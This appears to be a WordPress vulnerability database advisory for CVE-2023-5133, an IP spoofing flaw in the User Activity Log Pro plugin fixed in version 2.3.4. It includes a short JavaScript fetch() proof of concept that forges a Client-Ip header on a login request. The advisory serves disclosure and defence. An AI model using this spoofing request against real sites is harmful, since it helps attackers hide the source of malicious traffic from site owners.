WordPress Plugin Vulnerabilities

User Activity Log Pro < 2.3.4 - IP Spoofing

Description

This plugin retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic.

Proof of Concept

1. In User Activity Log > Settings, enable the setting "Allow Ip Address of users to log." and save settings.

2. Run the following code in the web browser and note on the backend that the IP address has been faked.

await fetch("/wp-login.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
    "Client-Ip": "8.8.8.8",
  },
  "body": "log=USERNAME&pwd=PASSWORD",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

Affects Plugins

Plugin icon
user-activity-log-pro
Fixed in 2.3.4

References

CVE
CVE-2023-5133

Classification

Type
SPOOFING
OWASP top 10
A5: Broken Access Control
CWE
CWE-290
CVSS
5.3 (medium)

Miscellaneous

Original Researcher
Bartlomiej Marek and Tomasz Swiadek
Submitter
Bartlomiej Marek
Verified
Yes
WPVDB ID
36c30e54-75e4-4df1-b01a-60c51c0e76a3

Timeline

Publicly Published
2023-09-25 (about 7 months ago)
Added
2023-09-25 (about 7 months ago)
Last Updated
2023-09-25 (about 7 months ago)

Other

Published
Title
Published
2023-11-06
Title
Security & Malware scan by CleanTalk < 2.121 - IP Spoofing
Published
2024-04-22
Title
Royal Elementor Addons < 1.3.95 - Unauthenticated IP Spoofing
Published
2024-04-27
Title
Survey Maker < 4.1.0 - IP Address Spoofing
Published
2024-04-22
Title
Giveaways and Contests by RafflePress < 1.12.11 - IP Spoofing
Published
2024-03-28
Title
IP Blocker Lite <= 11.1.1 - IP Spoofing